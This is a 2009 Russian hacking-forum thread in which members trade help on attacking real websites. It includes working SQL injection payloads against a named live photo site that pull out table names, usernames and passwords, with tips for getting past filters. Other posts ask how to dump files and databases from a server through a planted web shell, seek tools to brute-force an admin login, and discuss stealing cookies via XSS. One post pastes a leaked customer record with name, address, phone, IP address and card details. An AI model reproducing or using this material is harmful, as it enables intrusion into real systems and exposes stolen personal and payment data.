Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Pashkela, можно попытаться TABLE_SCHEMA и TABLE_NAME
    ну с лимитом то почему не работало в этом случае, хз
    в принципе конечно да, это не нужно
     
    #10161 fng, 18 Nov 2009
    Last edited: 18 Nov 2009
  2. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    На сервере где залит шелл стойт safe-mode
    Задача слить все файлы и БД
    Как это можно сделать, слышал что существуют архиваторы написанные на PHP
    Или чтонить что переместит файлы на мой ftp
     
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    с XSS дел почти никогда не имел,но на одном сайте нашел, интересно пассивная или актив? Что то можно выжить или нет?
     
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    пассивка,куки спионерить
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля

    -36))+union+select+1,2,3,4,unhex(hex(group_concat(table_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.columns+where+column_name+like+0x25757365726e616d6525--+
    -36))+union+select+1,2,3,4,5,unhex(hex(group_concat(column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.columns+where+table_name=0x657870745f75736572--+
    -36))+union+select+1,2,3,4,unhex(hex(username)),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
     
    1 person likes this.
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
     
  7. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    https://forum.antichat.net/thread109600.html
     
  8. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Дайте пожалуйста ответ по этой теме:http://forum.antichat.ru/thread155501.html
     
  9. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Code:
    (0000000039, 'jeffery', 'brown', 'pyramid lock', '[email protected]', '26434 lorenz', '', 'madison heights', 'mi', '48071', 'US', '248-837-9605', 'uKrNsZydbo8=', '0.00', '', '2008-10-18', '', 0, 'MasterCard', 0xad0dcd773619ed1d768fbeb219b14c3a0a23595ef189088ac8ba3ce3a5001944, 0x0a23595ef189088ac8ba3ce3a5001944, 0x5ea4b9f8995d33027b5f3e4b154e8d54, 0x0a23595ef189088ac8ba3ce3a5001944, '2009-09-15 19:05:24', '68.43.87.206', 'c-68-43-87-206.hsd1.mi.comcast.net', 'Active', ''),
    В чем это зашифровано?
    Code:
    0x5ea4b9f8995d33027b5f3e4b154e8d54
    Пробовал как Hex неполучается
     
  10. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    если я не ошибаюсь 0x+md5(), т.к.:
    strlen(5ea4b9f8995d33027b5f3e4b154e8d54)=32;
    &
    [a-f0-9]
     
  11. Axelhack

    Axelhack New Member

    Joined:
    19 Nov 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем привет,

    2 вопроса

    1. Бесплатный хостинг для XSS и
    2. сканер XSS багов на сайте.

    Прошу помочь. Благодарен Axelhack.
     
  12. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Подскажите, сканер выплюнул:

    С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.

    В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
    ФТП может висеть на удп? если да,то как приконектиться?
     
    #10172 p.r0phe.t, 20 Nov 2009
    Last edited: 20 Nov 2009
  13. Nosfer

    Nosfer New Member

    Joined:
    10 Jan 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    кто может подсказать по скуле в
    http://www.pngbd.com/photos/showgallery.php?cat=1'
    Никак не выходит, толи поля не подпираются, толи фильтр какой-то
     
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
    почему я подумал про скобку )))


    http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3,4%23
     
    _________________________
    1 person likes this.
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
     
    1 person likes this.
  16. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда,лить ток тхт файлы).Редкая довольно-таки вещь.
     
  17. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    В сервисе TFTP на 69 udp порту.
    Причём тут ХТТП? оО
    Какие ошибки нумеровать? ты о чём?
     
  18. Nosfer

    Nosfer New Member

    Joined:
    10 Jan 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,password,3,4+from+matryx_photos.users%23

    видимо стоят фильтры на password,users итд есть идеи как обойти?
     
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Емпти сет. Эта табличка пустая

    999')+UNION+SELECT+1,count(*),3,4+from+users--+

    Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
     
    1 person likes this.
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
     
Thread Status:
Not open for further replies.